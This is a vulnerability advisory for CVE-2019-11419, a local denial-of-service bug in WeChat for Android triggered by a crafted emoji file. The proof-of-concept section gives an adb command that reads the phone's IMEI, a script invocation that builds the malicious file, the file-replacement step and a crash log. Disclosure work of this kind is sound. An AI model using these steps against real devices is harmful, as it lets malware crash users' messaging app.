Headline
CVE-2019-11419: DoS Wechat with an emoji
vcodec2_hls_filter in libvoipCodec_v7a.so in the WeChat application through 7.0.3 for Android allows attackers to cause a denial of service (application crash) by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. The content of the replacement must be derived from the phone’s IMEI. The crash occurs upon receiving a message that contains the replaced emoji.
1 minute read
This DoS bug was reported to Tencent, but they decided not to fix because it’s not critical. The Common Vulnerabilities and Exposures (CVE) Program has assigned the ID CVE-2019-11419 to this issue.
Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for Android results in a DoS by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. Crash-log is provided in poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
Vulnerability Type:
Denial of Service
Vendor of Product:
Tencent
Affected Product Code Base:
WeChat for Android - Up to latest version (7.0.3)
Affected Component:
Function vcodec2_hls_filter in libvoipCodec_v7a.so
Attack Type:
Local
Attack vector:
An malware app can crafts a malicious emoji file and overwrites the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat messages that contain an emoji, WeChat will instantly crash.
POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
User must have sent or received a GIF file in WeChat
Malware app must retrieve the phone’s IMEI. For POC, we can use the below command
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=-Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted
WeChat will crash now if a message that contains the overwritten emoji file
Crash log:
Process: com.tencent.mm
Crash Thread: 27374(total:122)
Date/Time: 2108-12-12 +8.00 13:34:50.135
Live Time: 35s
Device: Pixel 2 XL android-27
Exception info:
Siginfo: errno:0, pid:0, uid:0, process:
after unwind signal thread
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: google/taimen/taimen:8.1.0/OPM4.171019.021.R1/4833808:user/release-keys
pid: 27147, tid: 27374 >>> com.tencent.mm <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000
after dump thread backtrace
#00 pc 0x0 <unknown> (???)
#01 pc 0x1f739b /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filter+546)
#02 pc 0x1f8efb /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filters+134)
#03 pc 0x1efa5d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#04 pc 0x1ea94f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_default_execute+30)
#05 pc 0x1f1c59 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#06 pc 0x1eaa49 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_decode_video2+120)
#07 pc 0x1e375d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (Vcodec2DecodeMultipleNals+176)
#08 pc 0x1e510f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::decodeColorComponents(unsigned char*, int)+70)
#09 pc 0x1e5791 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::add_buffer(unsigned char*, int, int, StWxAMFrame**)+228)
#10 pc 0x1e5995 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (wxam_dec_decode_buffer_3+12)
#11 pc 0x4c435 /data/app/com.tencent.mm-XUPZwNZyUC6RN4utDMIYMw==/lib/arm/libwechatcommon.so (Java_com_tencent_mm_plugin_gif_MMWXGFJNI_nativeDecodeBufferFrame+148)
...